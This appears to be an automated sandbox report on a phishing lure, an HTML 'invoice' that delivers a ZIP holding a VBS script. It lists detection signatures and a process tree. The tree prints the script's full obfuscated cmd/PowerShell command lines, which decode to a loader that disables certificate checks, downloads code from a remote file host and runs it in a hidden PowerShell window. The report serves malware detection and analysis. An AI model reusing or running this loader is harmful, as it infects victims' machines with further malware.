Windows
Analysis Report
faktura_FV2025020637756.html
Overview
General Information
Detection
| Score | Range | Confidence |
|---|---|---|
| 96 | 0 - 100 | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- chrome.exe (PID: 5908 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
- chrome.exe (PID: 4528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2148,i,14000748609247893809,15602923536421620925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
- unarchiver.exe (PID: 6704 cmdline: "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020637756.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2)
- 7za.exe (PID: 6728 cmdline: "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
- conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6796 cmdline: "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 6864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab\2025020641549.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cmd.exe (PID: 6268 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^^^|%{[char]($_/3)})-join'') ^^^| ^^^&($kwXZtAwej) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3068 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($kwXZtAwej = $('{4}{10}{9}' -f $('vgLBiPIqRxeU'.ToCharArray())); $((273,234,303,348,138,249,303,342,354,315,297,303,240,333,315,330,348,231,291,330,291,309,303,342,279,174,174,249,303,342,354,303,342,201,303,342,348,315,306,315,297,291,348,303,258,291,324,315,300,291,348,315,333,330,201,291,324,324,294,291,297,321,96,183,96,369,108,348,342,351,303,375,177,96,108,291,222,333,261,351,198,360,96,183,96,273,249,363,345,348,303,327,138,234,303,348,138,216,348,348,336,261,303,294,246,303,339,351,303,345,348,279,174,174,201,342,303,291,348,303,120,117,312,348,348,336,345,174,141,141,306,315,324,303,312,333,345,348,150,144,144,168,168,159,138,315,330,306,333,174,147,153,162,150,147,141,357,303,294,159,138,336,312,336,117,123,177,96,108,291,222,333,261,351,198,360,138,252,315,327,303,333,351,348,96,183,96,153,144,144,144,144,144,177,96,108,120,273,249,363,345,348,303,327,138,219,333,138,249,348,342,303,291,327,246,303,291,300,303,342,279,120,108,291,222,333,261,351,198,360,138,213,303,348,246,303,345,336,333,330,345,303,120,123,138,213,303,348,246,303,345,336,333,330,345,303,249,348,342,303,291,327,120,123,123,123,138,246,303,291,300,252,333,207,330,300,120,123,96,372,96,219,207,264)^|%{[char]($_/3)})-join'') ^| ^&($kwXZtAwej) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 3984 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- chrome.exe (PID: 6392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020637756.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
No configs have been found
No YARA matches
System Summary
| Source | Author |
|---|---|
| | frack113, Florian Roth |
| | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| | Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
| | Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community |
| | frack113, Nasreddine Bencherchali (Nextron Systems) |